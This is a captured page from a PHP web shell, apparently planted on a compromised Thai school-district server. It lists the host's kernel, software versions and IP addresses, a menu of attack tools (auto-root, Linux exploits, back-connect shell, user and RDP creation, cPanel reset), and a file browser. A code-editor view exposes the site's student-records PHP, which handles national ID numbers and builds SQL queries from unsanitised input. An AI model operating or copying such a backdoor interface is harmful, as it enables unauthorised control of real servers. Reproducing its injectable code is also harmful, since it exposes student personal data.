Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
student_main /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
install
[ DIR ]
drwxr-xr-x
manual
[ DIR ]
drwxr-xr-x
picture
[ DIR ]
drwxrwxrwx
upload
[ DIR ]
drwxrwxrwx
default.php
248
B
-rwxr-xr-x
ed_year.php
10.65
KB
-rwxr-xr-x
export_test.php
930
B
-rw-r--r--
export_to_excel.php
3.08
KB
-rwxr-xr-x
export_to_excel2.php
3.03
KB
-rwxr-xr-x
getxml_student.php
14.36
KB
-rw-r--r--
getxml_student.phpOLD
11.7
KB
-rwxr-xr-x
getxml_student2.php
9.39
KB
-rw-r--r--
index.php
258
B
-rwxr-xr-x
livesearch.php
625
B
-rwxr-xr-x
livesearch_2.php
640
B
-rwxr-xr-x
livesearch_3.php
629
B
-rwxr-xr-x
livesearch_mobile.php
630
B
-rwxr-xr-x
menu.php
5.64
KB
-rwxr-xr-x
menu_mobile.php
932
B
-rwxr-xr-x
permission.php
8.45
KB
-rwxr-xr-x
permission_sch.php
8.83
KB
-rwxr-xr-x
permission_sch_khet.php
13.49
KB
-rwxr-xr-x
return_permission_sch_khet.php
779
B
-rwxr-xr-x
student_getxml.php
2.51
KB
-rwxr-xr-x
student_getxml2.php
3.1
KB
-rwxr-xr-x
student_import.php
6.72
KB
-rwxr-xr-x
student_import2.php
8.26
KB
-rw-r--r--
student_import3.php
4.35
KB
-rw-r--r--
student_import_2.php
6.67
KB
-rw-r--r--
student_importx.php
6.36
KB
-rwxr-xr-x
student_khet_update.php
34.99
KB
-rwxr-xr-x
student_num.php
10.17
KB
-rw-r--r--
student_report1.php
14.48
KB
-rwxr-xr-x
student_report1_mobile.php
12.93
KB
-rwxr-xr-x
student_report2.php
9.46
KB
-rwxr-xr-x
student_report3.php
7.82
KB
-rwxr-xr-x
student_report4.php
10.73
KB
-rw-r--r--
student_report5.php
9.17
KB
-rw-r--r--
student_sch_update.php
25.93
KB
-rwxr-xr-x
student_tranfer.php
4.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : getxml_student.php
<?php error_reporting(0); defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); $sql_edyear = "select * from student_main_edyear where year_active='1'"; $dbquery_edyear = mysqli_query($connect,$sql_edyear); $result_edyear=mysqli_fetch_array($dbquery_edyear); $amss_ed_year=$result_edyear['ed_year']; $rec_date = date("Y-m-d"); //ส่วนบันทึกข้อมูล if($index==4){ $student_num=0; $insert_num=0; for($i=0;$i<count($_POST['name']);$i++){ $school_code=$_POST['school_code'][$i]; $student_id=$_POST['student_id'][$i]; $person_id_number=$_POST['person_id_number'][$i]; $person_id=$_POST['person_id_number'][$i]; $insert_index=1; $person_id=trim($person_id); $free_count=substr_count($person_id," "); $line_count=substr_count($person_id,"-"); $person_id_len=strlen($person_id); if($free_count>=1){ $insert_index=0; } if($line_count>=1){ $insert_index=0; } if($person_id_len!=13){ $insert_index=0; } $prename=$_POST['prename'][$i]; $name=$_POST['name'][$i]; $surname=$_POST['surname'][$i]; $sex=$_POST['sex'][$i]; if($sex==1){ $sex="ช"; } else if($sex==2){ $sex="ญ"; } $school_name=$_POST['school_name'][$i]; $smss_ed_year=$_POST['ed_year'][$i]; $classlevel=$_POST['classlevel'][$i]; $classroom=$_POST['classroom'][$i]; $sql = "select id from student_main_main where person_id='$person_id' and ed_year='$amss_ed_year' "; $dbquery = mysqli_query($connect,$sql); $row_num=mysqli_num_rows($dbquery); if(($row_num<1) and ($insert_index==1) and ($smss_ed_year==$amss_ed_year)){ $sql = "insert into student_main_main(ed_year,school_code,student_id,person_id,prename,name,surname,sex,school_name,classlevel,classroom,rec_date,officer,ref_id,disable,status) values ('$amss_ed_year','$school_code','$student_id','$person_id','$prename','$name','$surname','$sex','$school_name','$classlevel','$classroom','$rec_date','$_SESSION[login_user_id]','','0','0')"; if($dbquery = mysqli_query($connect,$sql)){ $insert_num++; } } $student_num++; } echo "<script>alert('บันทึกข้อมูล จำนวน $insert_num รายการ จากทั้งหมด $student_num รายการ');</script>\n"; echo "<script>document.location.href='?option=student_main&task=student_khet_update&school_index=$school_code';</script>\n"; } if(!(isset($_POST['urlGET']))){ echo "<br />"; echo "<form method='post' action='' id='frm1' name='frm1'>"; echo "<table align='center'>"; echo "<tr>"; echo "<td>"; $sql = "select * from system_sync_smss_2 left join system_school on system_sync_smss_2.office_code=system_school.school_code order by system_school.school_type,system_school.school_code"; $dbquery = mysqli_query($connect,$sql); $ROW=1; $COLUMN=1; echo "<fieldset>"; echo "<legend> <B>เลือกสถานศึกษา</B>: <input type='checkbox' name='insert_now' value='1'>บันทึกข้อมูลทันที</legend>"; echo "<table>"; $N=0; While ($result = mysqli_fetch_array($dbquery)){ $sync_code=$result['sync_code']; $sync_code2=md5($sync_code); if($ROW==1){ echo "<tr>"; } echo "<td><input type='checkbox' name='chk' onclick='Check()'>$result[school_code] $result[school_name]"; echo "<input type='hidden' name='urlGET[]' value='$result[school_code]' disabled>"; echo "</td>"; if($COLUMN==4){ echo "</tr>"; $COLUMN=0; $ROW=0; } $ROW++; $COLUMN++; $N++; } echo "</table>"; echo "</fieldset>"; echo "</td>"; echo "</tr>"; echo "</table>"; echo "<br />"; echo "<div align='center'><input type='submit'></div>"; echo "</form>"; } if(isset($_POST['urlGET'])){ $urlGET=$_POST['urlGET']; ; $requester_server_id = $_SERVER["SERVER_ADDR"]; echo "<form id='frm1' name='frm1'>"; foreach ($urlGET as &$value) { $school_code= $value; $sql_sync = "select * from system_sync_smss_2 where office_code='$school_code'"; $dbquery_sync = mysqli_query($connect,$sql_sync); $result_sync = mysqli_fetch_array($dbquery_sync); $smss_url=$result_sync['smss_url']; $sync_code=$result_sync['sync_code']; $url ="$smss_url"."export/xml.php?username=amssplus&password=$sync_code&requester_server_id=$requester_server_id&order=student"; $xmlDoc = new DOMDocument(); $xmlDoc->load($url); $announce = $xmlDoc->getElementsByTagName('item'); $warning=base64_decode($xmlDoc->getElementsByTagName('warning')->item(0)->nodeValue); if($warning!="1"){ echo "<br>"; echo "<div align='center'>"; echo $warning; echo "</div>"; } //ตรวจสอบการเข้าถุึงเว็บsmss $smss_fond="0"; if($warning!=""){ $smss_fond="1"; } if($smss_fond=="0"){ $smss_url = explode("?",$url); echo "<br>"; echo "<div align='center'>"; echo "ไม่สามารถเข้าถึง".$smss_url[0]; echo "</div>"; } if($warning==1 and $smss_fond=="1"){ echo "<br />"; echo "<table align='center' width='65%' border='0'>"; echo "<tr><td align='center'><b>รายชื่อนักเรียน"; $school_code=base64_decode($xmlDoc->getElementsByTagName('office_code')->item(0)->nodeValue); echo base64_decode($xmlDoc->getElementsByTagName('school_name')->item(0)->nodeValue); echo " "; echo $school_code; echo " ปีการศึกษา "; echo base64_decode($xmlDoc->getElementsByTagName('ed_year')->item(0)->nodeValue); echo "</b></td></tr>"; echo "</table>"; echo "<table align='center' width='70%' border='1' borderColor='#FF0033' style='border-collapse: collapse'>"; echo "<tr align='center' bgcolor='#FBD562'><td width='70'>ที่</td><td>เลขประจำตัวประชาชน</td><td>คำนำหน้าชื่อ</td><td>ชื่อ</td><td>นามสกุล</td><td width='50'>รหัสชั้น</td><td>ชั้น</td></tr>"; $i=1; $student_num=0; $insert_num=0; foreach ($announce as $ann) { if(($i%2) == 0) $color="#FFFFFF"; else $color="#FFFFFF"; $ed_year=base64_decode($xmlDoc->getElementsByTagName('ed_year')->item(0)->nodeValue); $school_name=base64_decode($xmlDoc->getElementsByTagName('school_name')->item(0)->nodeValue); $student_id=base64_decode($ann->getElementsByTagName('student_number')->item(0)->nodeValue); $person_id=base64_decode($ann->getElementsByTagName('person_id')->item(0)->nodeValue); $prename=base64_decode($ann->getElementsByTagName('prename')->item(0)->nodeValue); $name=base64_decode($ann->getElementsByTagName('student_name')->item(0)->nodeValue); $surname=base64_decode($ann->getElementsByTagName('student_surname')->item(0)->nodeValue); $sex=base64_decode($ann->getElementsByTagName('sex')->item(0)->nodeValue); $classlevel=base64_decode($ann->getElementsByTagName('class_now')->item(0)->nodeValue); $classroom=base64_decode($ann->getElementsByTagName('room')->item(0)->nodeValue); $class_name=base64_decode($ann->getElementsByTagName('class_name')->item(0)->nodeValue); echo "<tr bgcolor=$color align='center'>"; echo "<td align='center'><input type='checkbox' name='chk2[]' onclick='Check2()'>$i</td>"; echo "<td align='center'>"; $person_id=trim($person_id); $free_count=substr_count($person_id," "); if($free_count>=1){ echo "<font color='#FF0040'>*******</font>"; } $line_count=substr_count($person_id,"-"); if($line_count>=1){ echo "<font color='#FF0040'>*******</font>"; } $person_id_len=strlen($person_id); if($person_id_len!=13){ echo "<font color='#FF0040'>*******</font>"; } echo "<Input Type='Text' Name='person_id_number[]' Size='13' value='$person_id' disabled>"; echo "</td>"; echo "<td>"; echo "<Input Type='Text' Name='prename[]' Size='10' value='$prename' disabled>"; echo "</td>"; echo "<td>"; echo "<Input Type='Text' Name='name[]' Size='20' value='$name' disabled>"; echo "</td>"; echo "<td>"; echo "<Input Type='Text' Name='surname[]' Size='20' value='$surname' disabled>"; echo "</td>"; echo "<td>"; echo "<Input Type='Text' Name='classlevel[]' Size='5' value='$classlevel' disabled>"; echo "</td>"; echo "<td>"; echo "<Input Type='Text' Name='class_name[]' Size='20' value='$class_name' disabled>"; echo "</td>"; echo "<Input Type='Hidden' Name='student_id[]' Value='$student_id' disabled>"; echo "<Input Type='Hidden' Name='sex[]' Value='$sex' disabled>"; echo "<Input Type='Hidden' Name='classroom[]' Value='$classroom' disabled>"; echo "<Input Type='Hidden' Name='school_code[]' Value='$school_code' disabled>"; echo "<Input Type='Hidden' Name='school_name[]' Value='$school_name' disabled>"; echo "<Input Type='Hidden' Name='ed_year[]' Value='$ed_year' disabled>"; /////////////////////////////////////// if(isset($_POST['insert_now'])){ if($sex==1){ $sex="ช"; } else if($sex==2){ $sex="ญ"; } $sql = "select id from student_main_main where person_id='$person_id' and ed_year='$ed_year' "; $dbquery = mysqli_query($connect,$sql); $row_num=mysqli_num_rows($dbquery); if($row_num<1){ $sql = "insert into student_main_main(ed_year,school_code,student_id,person_id,prename,name,surname,sex,school_name,classlevel,classroom,rec_date,officer,ref_id,disable,status) values ('$ed_year','$school_code','$student_id','$person_id','$prename','$name','$surname','$sex','$school_name','$classlevel','$classroom','$rec_date','$_SESSION[login_user_id]','','0','0')"; if($dbquery = mysqli_query($connect,$sql)){ $insert_num++; } } $student_num++; } /////////////////////////////////// $i++; echo "</tr>"; } echo "</table>"; if(isset($_POST['insert_now'])){ echo "<script>alert('บันทึกข้อมูล จำนวน $insert_num รายการ จากทั้งหมด $student_num รายการ');</script>\n"; } echo "<br>"; } } //if not warning echo "<table align='center' width='70%' border='1' borderColor='#FF0033' style='border-collapse: collapse'>"; echo "<tr><td align='left'> <input type='checkbox' name='allchk' id='allchk' onclick='CheckAll()'> เลือกทั้งหมด <font color='#FF0000'>*ตรวจสอบรหัสชั้นให้ถูกต้อง</font></td></tr>"; echo "</table>"; echo "<table align='center' width='70%' border='0'>"; echo "<tr><td align='right'>หมายเหตุ การบันทึกข้อมูลได้ครั้งละเท่าไร ยังขึ้นอยู่กับการกำหนดค่าที่ php.ini</td></tr>"; echo "</table>"; echo "<br>"; echo "<div align='center'><INPUT TYPE='button' name='smb' value='บันทึก' onclick='goto_url(1)'></div>"; echo "</form>"; unset($value); // break the reference with the last element } ?> <script> function Check() { var x = document.getElementsByName("chk"); var y = document.getElementsByName("urlGET[]"); var i; for (i = 0; i < x.length; i++) { if (x[i].type == "checkbox") { if(x[i].checked == true){ y[i].disabled=false; } if(x[i].checked == false){ y[i].disabled=true; } } } } function Check2() { var x = document.getElementsByName("chk2[]"); var y1 = document.getElementsByName("person_id_number[]"); var y2 = document.getElementsByName("prename[]"); var y3 = document.getElementsByName("name[]"); var y4 = document.getElementsByName("surname[]"); var y5 = document.getElementsByName("classlevel[]"); var y6 = document.getElementsByName("class_name[]"); var y7 = document.getElementsByName("student_id[]"); var y8 = document.getElementsByName("sex[]"); var y9 = document.getElementsByName("classroom[]"); var y10 = document.getElementsByName("school_code[]"); var y11 = document.getElementsByName("school_name[]"); var y12 = document.getElementsByName("ed_year[]"); var i; for (i = 0; i < x.length; i++) { if (x[i].type == "checkbox") { if(x[i].checked == true){ y1[i].disabled=false; y2[i].disabled=false; y3[i].disabled=false; y4[i].disabled=false; y5[i].disabled=false; y6[i].disabled=false; y7[i].disabled=false; y8[i].disabled=false; y9[i].disabled=false; y10[i].disabled=false; y11[i].disabled=false; y12[i].disabled=false; } if(x[i].checked == false){ y1[i].disabled=true; y2[i].disabled=true; y3[i].disabled=true; y4[i].disabled=true; y5[i].disabled=true; y6[i].disabled=true; y7[i].disabled=true; y8[i].disabled=true; y9[i].disabled=true; y10[i].disabled=true; y11[i].disabled=true; y12[i].disabled=true; } } } } function CheckAll() { var x = document.getElementsByName("chk2[]"); var y1 = document.getElementsByName("person_id_number[]"); var y2 = document.getElementsByName("prename[]"); var y3 = document.getElementsByName("name[]"); var y4 = document.getElementsByName("surname[]"); var y5 = document.getElementsByName("classlevel[]"); var y6 = document.getElementsByName("class_name[]"); var y7 = document.getElementsByName("student_id[]"); var y8 = document.getElementsByName("sex[]"); var y9 = document.getElementsByName("classroom[]"); var y10 = document.getElementsByName("school_code[]"); var y11 = document.getElementsByName("school_name[]"); var y12 = document.getElementsByName("ed_year[]"); for (var i = 0; i < document.frm1.elements.length; i++) { if(document.frm1.allchk.checked==true){ x[i].checked=true; y1[i].disabled=false; y2[i].disabled=false; y3[i].disabled=false; y4[i].disabled=false; y5[i].disabled=false; y6[i].disabled=false; y7[i].disabled=false; y8[i].disabled=false; y9[i].disabled=false; y10[i].disabled=false; y11[i].disabled=false; y12[i].disabled=false; } else{ x[i].checked=false; y1[i].disabled=true; y2[i].disabled=true; y3[i].disabled=true; y4[i].disabled=true; y5[i].disabled=true; y6[i].disabled=true; y7[i].disabled=true; y8[i].disabled=true; y9[i].disabled=true; y10[i].disabled=true; y11[i].disabled=true; y12[i].disabled=true; } } } function goto_url(val){ callfrm("?option=student_main&task=getxml_student&index=4"); } </script>
Close
